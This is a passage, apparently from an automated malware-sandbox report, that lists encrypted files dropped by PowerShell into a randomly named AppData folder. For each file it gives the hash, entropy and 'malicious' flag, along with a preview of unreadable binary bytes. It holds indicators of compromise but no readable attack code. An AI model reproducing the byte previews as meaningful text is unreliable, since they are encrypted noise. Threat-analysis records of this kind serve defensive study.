-.z....q{Ms..:Mt/,'...`..T.<.H...SN.Y....].+.y.N:.B+r..2..I.T.d3~..k..8.z.&-5e1.A.V..x..._.yX).....:b.....ht........,........"~-...^t.U.....B.y..Ep.n....#.~r..Gr..v3cT/I.)p.......B$.N>.N2.~.....x......>.......a...MJt{..1{.+.u.........-ZG.w.....V-.b.,...\.m..y.tg,.Yg..3.m...n0...jQ.i.$.W.I.7...~T....{...... ...

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\baURfqVxYjlIenztg.APFKxGJCDcrZWBVseNz Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	139447
Entropy (8bit):	7.998625154293207
Encrypted:	true
SSDEEP:	3072:QQM2gDJFDqrQk9CO/YmpHORSNTNjGgBOJZMuYlG9Ma9:QjrJ1qEk9gmpuENTdGBMm
MD5:	902A7DC8D9BAA838FA5BCA923AFA48B1
SHA1:	62D7EB2B287BEDB7CBA9E02FA44D6B463F68DD83
SHA-256:	C1C79B66D358E92ED16F24533F1A2B9D7F53B9A0AEB6B22621688EE70CC680DB
SHA-512:	586EDC7CBDAED06F73F8E4D918871EDB08D3DD9F2B377F89FA817A8D12C9BD718AA3C9766EC52655D1E74568C4FF092A4AD3072C9D54D8CA611145FA99769E8E
Malicious:	true
Reputation:	unknown
Preview:	..<.c.q:V.5.".....#..?h#0.2{.).P..A....-.JE.u...n..`.X2..3T?...@.V......&D.......hi T..o.ep..7v..5.k.v..T.2.....W$.k#..b.($.pp...B.x....I..P....j.D...iI+.XQ.m..B..f...."...5.p).,>j.N/..BE...S>z.M.#~?i....Jf..a...[..R..G.dy.H..."A.........{d]V/.f..5.Q......e..7..D....4i.HA.q.#..;.u.0..nX/....D.=.$......l,"{_..n...t...i&.y.g^........ .&..K...hr..... &x.R....W.N~...2...z..I4.K......u.......4.,.d...O#;..B.......a.:."<...h..(..2.D.....u}W.......\|GZjt;.@.........h...82..2.......j.S..?Z/.E...o=....'...Jq....Kp....7......".wE.!.j..[..... \C.VQ.z.X.....1#...+K....b3..{.`.M..{...m?I...'...d...N.<.rF.;\NJ-...o.....AZ4:.tq.R..<K.>:.....etY...<.b.7..I.a7>b.i..G]K.0.[.'.....t.5,.7..].nx4:.j..0GF.@.....n.....=...%......9p(.\|,A...:.BaR.Z.G^.w..Q7..1./......iQ"T...qZ...'...Qr...Y....E.....<.<Oz....7.9....Mk...w.R.}..l..2.....5.S.O,!.Z..]ZB;......>.2.r.R......HLYK.f..o.....%......H...M.E..y(U'z`. C..g...(o.3z<.&.^5...u..:...._.L.....^.....5.v...Dh.S...-.K.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\biZCFDSfAyhpWxXPs.eVqzEilaBbrwAnMdUPQ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	130353
Entropy (8bit):	7.998795989172623
Encrypted:	true
SSDEEP:	1536:XadPUBVsKGzedqJF42Xnkx7cMzzXm379Dv+dzz6VMVgeXhJLSLMLX1AFbeA7REij:te5lLXjMXXOxverVg+32obSbltq07
MD5:	4CD4380CE8A843396CBD2865AFA0C296
SHA1:	573BF7A57FF0A9A4284B9E8BE03F8021F92B88F5
SHA-256:	046F2607A4369DE99E32DDE609D117D940D8BE9B3A36ECAB65DA13941279D2AE
SHA-512:	81D69BCDD24BB01E32B03D92CB7AB70FADDAE19F7E5131519FA4455D30811D21452AFCC51F185D346DF0EC8D1BFB433F8D00D948FC25D96DCFEA2F393ED17E99
Malicious:	true
Reputation:	unknown
Preview:	9.....s.&.x.r_.yX...uM...LU...3.1....9.w.(.C!.....l.^=........{...[...25.MT..J..>Z..g.X.(L..}..%...M.).b..j.;.".<)....s..s.:........jA..g.)...@.....^&V...'.....P.Kt.`..'...V..s?j.ds...o.X~ .y.8... ".6W.. {r)uC..q..........[...T.G..<n....j...s.\.D.M2......^.. %^v..l.v>..v..?....\...~...<y.....\...(.5........lTH...a.<g...+..,....u...qe..}\|b.d...E+..).7.k...t.h..1....o.Q;.].J:5pa..KY.9;.._B...e..C...]:q....6]w.~.U7..y~....H....k.......;-......'..H.....M.(]..... ...&..>PwF..D...=".(...h...(.P.DE.aqp....1.=...N-..\J..7....8&d.`.Rx.....$..Q.._89..8..u..^s.....5!-.1......;N.,...a.?...'....Z..4)..(h..+..J:7D1.Y.]MuZE5....V...\.....^^...?..\...r.6......#....A...._.\..a....BFL.....[.C...;.?.Zk.>.xt.A8.\9.O...Q..p........"....T.......x]..^......\|....zu.:P 4G...B...>.D`T..d74.....<5L.\#..DX)...x.$...>n..........L.....^..../.e.R....h.....$..U.)......r^..6C+..V}3}../......9BB.....U.i...........@...h].B.V..$w...j.}.....;.O.{...k....YD_.4...a..=mi....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\bmsVSYANwXhpzUvIMrn.czDnvWbgpuUEPjBCOa Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	86876
Entropy (8bit):	7.997807423182081
Encrypted:	true
SSDEEP:	1536:EKTZg6eCfRPg6H/pHyzmvXKkzyRS8sKSkNqa04TCNQvII5z/mzAq:ZZleCtxHA4PuRNGkNqss2II5Q
MD5:	4EF02D37656EF6E54E87289C2C542D15
SHA1:	841CD1ADB4D0B4CD58843215866875E7998516B1
SHA-256:	AEA5811B56C9607292F4549F37CF859AAC5B0DEF35EB6AAB91809E18A6B81AC2
SHA-512:	A4EEF5F6DF3F8D43C726C897E1F30D130A7EF0B7808F167726FB2B12183F063C040D1B7F0009C3E358360037C35A0C8459F7BFFAB9DA69B69489E8953008F869
Malicious:	true
Reputation:	unknown
Preview:	2)..`....!..<.SA;...Nb.B..2x4.\C.lua....s.E.G....yO4.75..(x...`.....[.......C..S.:...D.=,.......#)...y.3C.OO...%~p.S...N~.}.&.. g.Q..}.....~..^.X}.VP'`3P...6.lOm................fo....K..$.X.....S...ev:.[.z..3......#.Q....0K.....J.e..C8."3...{.m..0.>..h.}...p.../+>dT../.?w...Q.V.~Q...7..'.C...L./{..D:..Y..ro"...2./r,H.....e.h."@..9...qGp... .n..R.O:1..#..._WM.E9...........dHZ0..e...f=..]K>c4?..7.kbWrfXsZ0g........1&.;.....y....6WF-..t.p..bM..+/.[.Dc....rE...?kv3.Z.....K.o>Jk.I.6.A.<..AV.w.H.#.@u^.lG....$.(.'...")..H.V.."...L[...t..N..m.t..TP.....~....@.....1../......L..9.,_.L.mwy`~d..5....p...;+&..r.t....m...l..p.p.. ~..~. \|w....h.V.3...^.....f.....T}<....l.9..5......,..}.....wi....z...%...~.s.U.u']w!..).6Hr.....v\$..K....G/.hC!....T............Q1.v.b.(......P..@...bp^....#...Zk......mm..N..W.Sn.....Ph9E....pFc.`...d.r.Q...E.N.)qAN./.-z..h."C.w...E....o..r.........0S..~S...g.O..{aG.=........OE.b...d.4...A>.#.e:..@.o.qK\...V-."......x.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\cEixHDpRSbGoMnw.qfVrymThPLnRHwka Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	158793
Entropy (8bit):	7.99890425030742
Encrypted:	true
SSDEEP:	3072:iOYA3lqua6gzuLuMJHgFLx2eaZKheqg0MZD+mCy+7vqewho8lOpaWty1Q+SXHxH:iOY6ja6gzrLb1AwqpogmaWtEWZ
MD5:	FAF6248C299E07CE6F7CF69A9BC8D0E4
SHA1:	14F2EE52489FC95187E682315781D4EC533A8A66
SHA-256:	3093169DB07B8A84CCBE284CFAAA4659B0FFEDE66BB92B829DEA2B66366C2DEC
SHA-512:	AA514854A48D9CC77D27D17804AF342AAC6150181535377C86E23927D043B39A1904E129515AFB1F871E4F8D4A4F203688DA176DE0EE24FEBEC8DD45B8A4240B
Malicious:	true
Reputation:	unknown
Preview:	=..t..7.cAF.M..[g.WM....._.....tF.....8..wL`..T2...`G&.~.&G.}.t..L.["....J.\|..:......c..].@.zX.....bs..NLIH..1.qP......;....f..G.....A+....G+..].YO..U.&.h....u.<.jw.......AZ.x...,..31!.p.i...X.e..c.).o..Q..v.....~...I...w@..u...t^"....l.....y.....o.+.!.V...?.(..{..H.....>..<.c......IC..P.S..i.w".>K...zJ2.(...H.-.p..2Z...e..Y.T...%.Z....g.5..%q{3{O...4..m...P.."..........i...X ).3B4V..2F=_.P5..R.nj.0.....B..&5...\|b.....35.eI...R.c.%.L.P...."...W.[.1...O.....C......H..4b..&...B...1I.[@..S.c.{......@uH.b@...Y..k.8"r...9...(..S..3q.f..Ai.$.l.....!R..Ty...l.b...% ..QQ..f......B...BE,..W.T...l.....).......A....f.......c..hO..,...q.-.K.....L.>.s[..p...{l...Q.......8.=.lt...q.O.....".A..a.;........"F..c=.U...t.=...xf.w..40l.r.+KO.n<.y.p]kiD..+X......aN.NL...%T..,t..G...Zj@......h.@.."...SY..?WAp....d.......x...J..5..D..i.V....=>.F.j[..c..^x.....i.. ..M.^]._..:....h...y.......3_!H..+...5....$....j.a@.7B...O.........y......m....{..7...$\

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\cNZgRVKkPWflQaIX.bGTEjRghUSu Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PARIX object
Category:	dropped
Size (bytes):	137778
Entropy (8bit):	7.998904894174287
Encrypted:	true
SSDEEP:	3072:uJuDLCQQgPBmr8SArKD1Y3B2ZVrxKc9c+yGaNKIOjO8CfggIubSL:8unaYmrp5JY34ZxCN2y2g/SL
MD5:	AC744E2805918F1E866150E76D6A553C
SHA1:	0BF3031503FAC589AB24083847DC1A40BC05DAFA
SHA-256:	302B221C830190B1ADD1A57C86CB5A7D5DB18462D129431AFBDECAD7C6389F34
SHA-512:	3A33BECB9432960CA1E88B05D2F04E6D396AAE333482108DEB58E414533A2F3495B37BA2A3BD6F2A3C43D15705D5440FD78B4ED46938E71B7D9909AC41A6D466
Malicious:	true
Reputation:	unknown
Preview:	.....F^9....@".5 ...'.#..m........E..)v....BE_f.a.g+.\..n.F.S..s...+...^....*.B..+..e....a.........w.]".!...z.{..'...e..AU...-m.#[{....\.~^...>.......p.T.=-....._..!.M,..S.Gm...e.......],'...`.+..%.....\.L...:.......z&.......v#..af....E...%% .F..&.ix3..i.0B.t,.9>9...".4..n...].L...3..I......T..SQ,..24.......'e..U...&.2......<._n.c.....@..c.^J.M`[..a...s.2c.-..O=Vp...B.....2.X..?.Ea .Tv...D....6.Xs-.....A".t,)y...6o.p....R.##.".S..Hrt[..4..i..0!.0.l.. . .r.l...a.fv.g.\.;:.H.....Y"....=RW.!W.9!.>..l.%....Q.d.&i.?..+.u9E..;.%..Az..X........z.+.....K..Tp'.4. ....%.M..&4EjN...A.....h.......$&1......L.%.."].n.w....Xx)...e] C....k.D......,?Y,_.H.D..\..v(.....x..'.O"...W.c..t9.........>D...m.......@&.s.m.Pn....j.............4KO.-.wg..c8..ipU.....H8........R6....j..Bzu6f.)M../H-!.zza.Z.E]e7P...2.F;N...\|9.._......K;..vV.........:...4...(.u..g.-H#Lc.F...}#9S.....)]../g...:.N..DJ...'EE.....!....0.....I....d.V..e........b..$.G...k...$.....#..9.cZ9

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\cTiCMnIvsloge.wIQZtTufGBgDhHCnlJ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	158572
Entropy (8bit):	7.998895417638949
Encrypted:	true
SSDEEP:	3072:CexqEmCSni2oP4P/eLUYhbUbNJm+B82pxeYUGj4M5iyIN5Kn1lAxyW5H4:CyqEEbaUObcj24Up/yq5KnPjWi
MD5:	0152E423CBF9B293B06FBC9F7EBF1F38
SHA1:	7AEE51803D7D90C240DB72D3E04ACDA1185B6725
SHA-256:	567494BEDC19D60F5859FBEA1E96C407F1FEF980F6D9E62860B91B09BEAFEFFB
SHA-512:	A31DC6D805851C78F2D3912862A64C2A08DC475685939AF49B1889D205124537BF1828E3072DF553D6EC12ECD00E38F8CF6B25A36E65E5810126737909F6E19D
Malicious:	true
Reputation:	unknown
Preview:	#I...].u...Y.."...}...g".B....S../\|.....J.\..yv8..Y.#...Ba.S6.mx.;..0.5Ud.].......`j.wG.4..Y&.g....?)..z..3.y.{..<...$5...........}.....D..W8........]..Hk....@..k..1f.L.w[I.H......>.n..=..n.oo.~...\....."TX....g..Y,.[(J.+.D...\|..'\|+..$.L..G.....mOR...x...G:.y.-..o}.%.r....m.I.Q.M.j4.%.;.z..?i.....J....u.!....gN....~VW....\|.W,}.k...Q.z.8.q(.....C_.zV.$...$@...n` ....S.....2.......~;V....L.u...,gC...&....5..Q........B..oE5... .<^.k\|.m.=.j..5.0.-J.......6...q".$.._..t.5Y..l...F.R.^..a..6.%....p.....W....W1.TG.~.\.....=d._...4..u.\|bb....q.z.J..E......#.ti].H\.R.d'.7c.......l.+...oE...1}G.U.Py..d.....?1......n....X1.Q.l...Io..HM.n...V.V.x.l;.[.(C3....:I%..#<.f5.......!.......M.B5x\|w^...2..>7..g46.WW..3.V..h.?Q.U.wd.#...u..R...e....D.1......D[...t@.._.kn73O.;...... ..`..k\......@\|X.D........!X<..;......T.`s^.)wJ..>..H...5..:..=.......P.F.$..W.A.GI.g....W...5.."_.z..k...p.(UDc@D...32.....7>P....K.z..f..H_....J?.).+Y...rC.."-.M.y.E.6

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\crjCLVRwlHBzkeM.PzYMvDgtoBapeLu Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	156967
Entropy (8bit):	7.998846608290392
Encrypted:	true
SSDEEP:	3072:TiHyY7cgISWXrPFbNCNTqOi6LzqZnPyu9LVpG6Mj5Nv1NDWhH8Q858zSi3nb:2H3HArPFbK+Qyyud+3jVWhc95Irr
MD5:	2F0F34852D858A928305FE97D3BE3424
SHA1:	2ACF26E52F4FE9667353084F3ACC935C50C2B0E1
SHA-256:	3C76E60355C5E87A709A9CE056E389B97CF5919BA3BE1B3F20F31E99B0CC31CE
SHA-512:	70BEF27AE0DA5AC3D3EDC0645D19AC892E734DD3E1D135DCF9BE12B3B0AA28CD67F2BC04AC8D99589564303273D4405CABB923E5F2CC928AD1D863FA81497EFA
Malicious:	true
Reputation:	unknown
Preview:	...jU(..m....z.....hY;...mF..$..ZY.0a..:.pG.S[....[...4.....c..-. ...Z.y.p.0H.q..I.......&.z\|.....:....._...iRq.N..CA .I.......H.....V..n........2+.~w.i..B/....n.........q.).+8&M...>.=h.+z.n$......b3.p...8.@...3"...n...XGfwn.y.4Xd.T.Y..E/..c.....&Eq8xg.):..#NL.tH..K3.(Z...w..Bm...,r.</b9....1......uI...h.....H....kN.BtF..\|l..y.N.es}......x..1.."...ETk.?~t4.y...{K..\|.$.#....KV...... ..C.B..w.].....Ka3j.!m..03.,..\:.Z,...hnR..p.M...l8.Ul..tg.....4...[.z....Su.-..)....Z{.,.Y..#.o[.9.x.Y...F..o.d..0./.#b..q$.Q...Wd...-..x.d.1..`..>.[9.%+.P4.8...o.^.7`!1.0...R-3...+.\|.}.V.JJ...s...l....C...\...!s.E..b..tFJ..L;cxW".._c.t...CzN..YR...p.N.D ......\5~le8.Y....5.m..{.9.f..q..'..2C>..NM,.j=K(.x.......x.._..u-1b.Td.8..\..H.M=a]\).....9.9N.7-<..j.d`.f....\|u..9.K......../.....d..J..3:...wH..}..&\|.:..ybV6......~...T.....9.?)...s6.Oa.f........=.._E'~P.5.)...T........P.jJ..V..h.L...+.<W.H.Y..1..C@...eC..1..2."..bw.DR...B..%..%^u.:.gk..n..x.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\cxpQviPowtRuZVrDT.lbmjGsVipUvSMadJcrP Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	117631
Entropy (8bit):	7.998494650863556
Encrypted:	true
SSDEEP:	3072:rzC2HGNFFjd0BxgZjn3UJved01KQ/FL2v9wEuD:r3HKFFjd0BxgNm1KYFLq95E
MD5:	CF44EC1FA29BD776767B36E31107CDAC
SHA1:	61D0FF182C9B0109A048F69FEDE39FC87197E548
SHA-256:	611A5292F15F8C1FEF517694AD5D9E78230889B7C83B02E3426F6FCD3BA9BC67
SHA-512:	813396351855A3FFF0E1881F97650200CCABF7B1D546B24BA2FEF1994F758BB26307ADC8FF5D36AEF639402E0BB080A9F98DF73279F306F8B29B215C33E0A9F3
Malicious:	true
Reputation:	unknown
Preview:	......:G...Y....-....!....X#....,f........"..X{.\...}o^.)..#I....o.!..Dz.}u..-uN.........o\.5.$..%.q!.j.m.R>Z....#..x..>u....G............j.).y.K..j....2....y..x@3.-.{.b.>e.L.[..5.[.<........?.+...[f..@'...^.9P.c.....:~.0....oc..9B...h.+.....v>...9..+.9.....'.i...E.G^.y'..p%.!.a.8e..x...[ ..V^..z...Z.7`.f%.....1.x=..j.mY:=.....pT8.i..O.lu...%.$.6....b...Q..3..r...f...;.kd...-.=....HT...x...:.]...........xx.4........g..a0X...?..feE...[N...~T.j.T..r...S^..s.8...ZV...D.f(...g..9.....{,@gEe.tW...<B.)..N..q.,..SM=....Hk......O+...i...b.....k. ..5s8b...!.[...2.A7C.l...&,y..s......V./T.N_...F....%..d.<.f.jV.(\.V.....]..\22.H....*w[....D..}..r\.?I.X+...4.........J.xf.....w...,.8..\9_..y......\|Wm.~....#.sC7..gx...V.C...~11....<...BW; z.h .A..<.^..b...Fo..2\|H.h.5;n......?....;..8w...5.\|G{ .n..`%Q.3.#.0...........yL...}v...);.u6.)SI.........q<6..`.C......%zq.,.".p0.J....E...I.'..Tn...o..d._.....G.\|.S.G.)..I....<.t\..iM.....~..9.....t

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\dExVgJtZmFM.dVgUHwiGMN Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	190096
Entropy (8bit):	7.998876962391948
Encrypted:	true
SSDEEP:	3072:zGiT9C1V4K+lM+pXAOTysLKfzfPLgHdUIr7y1WFmEwddCm8xYpkxlsUn01lf:6n1qllM6XvTyMo0HaULKCmSH/01x
MD5:	DB8DB1122AE21F2CF9BE091CAFAC5D49
SHA1:	EEFC6EB90BFA467CC5FA67011C3679946B8D6E95
SHA-256:	C98E7D64536CC474962B650FC17FFBB6B3102A042F54079056C15DDFDE636A3F
SHA-512:	CD251E3E0A627F20365D6711D86EA9CDC56AE3252C9A102C0296CD330E7D9757E55B150BBCD1B2D585E35A0897BE290ED3E30072E77629A74F0EF0F09E96B6AC
Malicious:	true
Reputation:	unknown
Preview:	.......D.........=mq.[...[4..."E#...^N..)..x...qt...c6..Vtrb...v...-..#Jl.W.B...+.@.{.........f0/..."C.e..p.V..X[6+.G.&Z.{..H1.'.@.....5....[.~..V:r....H...N;.b.[hNd....+....s.Q..8_7......GK&...&U..^....K...U....)&$./}..O\..1....{V.._._v....."......Xe...u'.x..1..-..\...5\|.'....."..s...N....d.ue..\|;....>..9"..6...-...ri{J'eb.>.".!J._rY5.U(.......8....G4..z.........H.R-IIT.j1...P!.E...=.\cK.d......qd...a..MS.1.`.S.j-}.........1.....s..qSt..p.....O...fl....p67..Gr.tjo.h.).k.X...s....%.....&..=qF(.....Q .p......):.JLA....A..Y..0<C\.......~.-kH}Z.6..[x...o.8dv.&~u.&.0..@.fv.ev.<.E..R....v ..Odw...W[....%@.....1D.+..e<...mH.....J.Ub5g.....X'!.32..a...(../z.%Igx..]...wv..aa.....82.i.692....v8..>d$....(c.9..BY.4Y1!&..!..lR.o.&.li..&3...s.H..f.'.UT...H...]..V...b...&.VS!K....5Z.].6T._#..A....5(s.k4./.H.. ..V....@..>Q...Pb`....y.%.....c....Rlx...eN.e.#q.c.R}6...`.b0.~S....f...A$+..W...+B...k.z......,.....o....n.).HW..R..GH.Y....D<0.(...2.&Y...ZPl.V1f..PP

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\dSuqKXtAxrGvUlE.ebvmRkXsMNtyE Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	168790
Entropy (8bit):	7.998808049709229
Encrypted:	true
SSDEEP:	3072:VrzMc/JyfRrLpTORZcWW1gF91ps3MVEYi2xrUQplo6rUUpBctmkdRlXDN35hYL8X:1McRyNtTORaWWWFa8VpvaZ6gyBvCBDNd
MD5:	7D9F7A56ABA01AF0161214746A3EBC8A
SHA1:	273A7C8C9241A87A426D26629C235E7D746A7048
SHA-256:	D271BF158377D5B0C8378CB105EDBB03CD67841330AD52E3679882E1E6B3E6EC
SHA-512:	40B53E198DEBF1C5CA5C1FC07C754B6F4EC610FE2BF93568707E37E903CF206C8CC23C4A78721BE96E8B4DFE6DF9D36E46310A8495EDA062E0D45DC2463A95C4
Malicious:	true
Reputation:	unknown
Preview:	..,/H..E\|.1`.g.Y6H.a!x2.ZA...a....\j...0........\7-..o.H..O\|.}....9.G+-0).f^.J...l=W]b"U/..{.N...]~....Wp...:Io..R)\g<....7P...p...b.p.l....8...q.....!..#.....\|y.o].i.4.u.z..S.......J..M...$.R...Ne.R..D......<'..a..$.PcW$..[....=y%}S..J#..}.h......a..+...../.....)..o2.....D......d.......5.M.i./]...L.N!.>._n".mg\|I..]u.3b....F..K...6..a+uMG.......@X.R.T..J....J"@.}.E.C.2......Y...\..DL.`.D}O.{.cbI....SSJh$.Y.a..v/..w.....N.I..H;...?.t..(.....c.L.}....e..x...&....q........j..\{.H.d...cM.<>...\../..F?.Y0....E...8..J...P.\....-k%.{.Jp.Vo.........;3.Y{.'....=...?.j.._N.....?.W..>.....[A...2c...Cz......E..f..].na........oT%.bK.nd...S....U.x.......6Kv..>m..dR9.Zt..j....r39.4X.X.`e.7.f.....&!~.p....Y..m.C.e...TF..e"\."..{..P..G.....l{f.?" ..l...H..E....o3.....]:...X.X........u(.=.q...p.3...rd..r.Y....)....`\..f......K.Ydc....d..!.1zG.a.`....-..D".Z..@G..4?_.A.E..[..\u...U.5....^U->.2..T. L.....~..Q?.L..r....d....( /...S...MWD._.a..9.@~q?.n.{......].

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\eSuhvixzbmtJHA.whLFRSsDbelv Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	140113
Entropy (8bit):	7.9987480180622805
Encrypted:	true
SSDEEP:	3072:+Xe29pRc4HMwtf1oquJf1kx9fTSa0/hZ6l6retCp/t:spyGMM1opcpG6AiURt
MD5:	E4E7DD634AEEBE96D373772C574AD2E0
SHA1:	091A2F03AB99EC63B0A7E76682D1793528FFD1F0
SHA-256:	7EDEAFA745D7B9B0B9EEDDE4C53777EB6384C5B7D85650832927F99FAF2245A0
SHA-512:	F972704B598564A4C8647AC454D72BC90A563A6F3A92870220546B4982F0D3039C38AD79E88F358FCCC9E22AF6CBBD2BB2C34FA64D68739766D487F61123B52E
Malicious:	true
Reputation:	unknown
Preview:	...$`.V+.Zx.'g.SQ.F.3p..... #.@\..p....P...??.....Iny,t`/x...8w `L.3........Ia.2.w.....d.vw\.U.yl.......N.........=..c.U^..(.k.._...."d.$n.OG._...b..2...[m......IcJ..........E~;.+9...n.<...T......_S....=Y...'U.,.... ....Kh.wU.J...e..D.v...}._=..#..2O....._..5.Z8!.........ppj.0....q..piV'..G.....@{..@w.D2.;..F....'.F.-]S...Su.j..s..,A.....-.1.F..+.5.PM^5Yd....#W..... ././..Z.V.V."h...4...]...O.T.N.. ......Kf.C.@..6.ZU.,..&.u...D>AF..SmB.U.....4.........\c.e.d.......cl/x....m@A..~_I......x.x.7M.-.....x.F.cj...R...G..q.f.Y....Ye.@...._.;...S..D..Q.Z$..o..,F........`6...K.E.S&..`H.q.&.bX....R^..{.$WE.#W.........w..m....]T5E....y=.#.,.\......p......F......1"....J....^...#o..j]..DDDn..aN.....D.p...~..)et.p"#f....c.M..N..=.4+...N...5[EX.P..t.L]>g..../-..@.K).M...A..@h3..d.Z..S.h.....KZ..j'D.\d..n&...i.q..^ci.b<....5....r..yd.'.E~-e].Ly$..6dq......\.0...k....6.$z5.c}K+..T...Eq{6Z.....>...,/..@..1.S..J...h..S.>k.:.8V$.jK.V....?...2..!a......

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\eUWLNnJZxvDip.wXGAuojSarmH Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	53366
Entropy (8bit):	7.996601113152427
Encrypted:	true
SSDEEP:	1536:bXLQuzsSuhVR/BuUJAhPYXxmpxYJlhav72LwQxYa70T:HfGhVRJuUJ+QYpxYXhav7KxYa4T
MD5:	4EA7950E622F50029EA2E679DEB4A5C3
SHA1:	671F1BDEDC47ED21A046D1EE75811C9D820A8CBD
SHA-256:	52696DFFC4712D9FD509973024B0F43512FC51CF3AABF1802C3788E46A82AADF
SHA-512:	CD8E5673BC4535929985075800738BE79391ABDDBC8BC6FA82B5B5BA68AC76E8F064A9D9D5B1CD1AD8ED0931F6A011EB598D3B7E8DAE6A0537D8ABBE4F1B5F9F
Malicious:	true
Reputation:	unknown
Preview:	.J.......Q(isq..Pt2...v......ao....[\|.<..@.U.2...m........Jhp..l..a.I.8d.R\| ..w....a0..f..r-....s...B.L..&..,.z5.de..;...(SP.......'.I....9.z<...M..IM.G..Z.ENI...U..>.y.1...T..s.y3..=..\s........^.m......_.GX....J...c.6.7l....Q,.c....$......fB...$...7....x.....6O........)5wE....i....w.._;...".N..?d.mY..L.2.L........@-{.V ..(n.A...3....3F,fpy.l...d$#.@...{.d...pb.u.9.%....~.{........Uh.3yy.h.e.A.......@...W. .-......SGW....t..:......i.z.J..X.:.w...d.V.T..U.!....6Q.....L{.;.\....7.H.K....4E..K..-...+.v..AG.K`ce..].......`.r.q..X..)l...C......t#..]o'..pwn..K.W/.i;..}.....-......u.[6..q....H.;x8.,qwrd...J...>V.....2.......Ph.d..u;>B6J.MdFw...Bi3..e.s.Q=.i..........\|y..T.......X)M....R...6.+S.q.6.7...y...jD0..o...:...M..}..e..!@.(...@.wxK....`g....h...F.~..$._\Yj..1h=...G....!.j.&.sZ...~\|s&.1......^........X."9....F......[....K..@hy.JB.....l...........v$.....q......H....,.[*i.Cf.Ei....1........ z7G...MJ.q..K..ga..o..H6......./.Vk....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\eaimdoOFjhTYkG.ibPkNAtxuSOgHho Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	197333
Entropy (8bit):	7.998981198243012
Encrypted:	true
SSDEEP:	6144:Vy34gpnRxx/zUzCnZy8cESFA+jwXEJpTgf20p2:TunRxx/zUzq885Z+kXEJpUO
MD5:	C892ACDD3D1199ABD8275700E1FA8471
SHA1:	1F25803601DCB542BC090D1FC54357915634FBB5
SHA-256:	6F444C0B0B9C3A4A96B3C9459D20D7A60945B7E4C87109B4167748FCEA43F8BF
SHA-512:	BFAF803C27D193E418FC651D55DA24C3D1FAA00D7492B5DD625A0CC76BB2C2C1345FE6AEA806AF77864BF1ABC8CF607B3414E699F4544334422B779A66231DA9
Malicious:	true
Reputation:	unknown
Preview:	.b...7dT...B...<.f.`..X.....,.;....s..~.O..,...M....L .U.....}'.Ty.tR..S./...+@.%P..p.Cg.4i...K.s...Rp.ck4........_I..5.6S..&'...?..R/..U..<.&X....n..H^.'....<Cf.8.....p...l.....z.f^S..B.+T..yTc.0....)...Q..h...a...nV..^aB.z..#."q..=`a.P...........1I..5D......]......3{..$.b.V..\|..V.A.g........$..}...-..0.g.......I}.@;.....).;.1.vC...(...8.7..A.......A..GU.^V..U......!dY/......wV...Q..&....7..3.......{Cl.>..mA-........6NH!uN........G....Q..P..f.B.)...-.K0..zI..:K....Y..Z..z...9.:TL......G.F.{....aKN.o.yuV0..g..W..7%>.k..u}..`C.....U~.....w8{#[\.n..".K8......k....t.......<..."..../.E.aqN4.f...V..3..df.Y....i..o&.../.:.F.}...z#(..b.#S..[.....x......u...._..h.Of@.....,.b.....>E..]e.WgF....W_..j.K...J.)$.....)kTJ...8..I.n.."4.\.Q.A.Q.2.'O'..{...5q..^l.r.o.{...6.T..B..nn@"F.=....6~....\|.O<...a....eZ..,m+.2.m]..;W'.W0....2..n.......#:.fCu.J...7.;9.^.t..._..U/m.1...%[...EU>S.....K.h...D....bt9q,......x..Gi.....?"...hf.\|/.$P.....M..^.).k.m.Z\.B"Q..

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\ebxJqEhBDMUgpyXLQ.AYKaQVWmfcvpu Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	140080
Entropy (8bit):	7.998666208582816
Encrypted:	true
SSDEEP:	3072:N+djNa1WxhKa9KUW0YlHE+ls/Fg+snVNQIeABmqwTuclIlX:NGa12ga9LKstgNnrjfBmqwTBilX
MD5:	7F5E594D14DF1B534A75A5C8B120CA97
SHA1:	606824D39F40BAFA970AEED939AC4F7D23E1C8D8
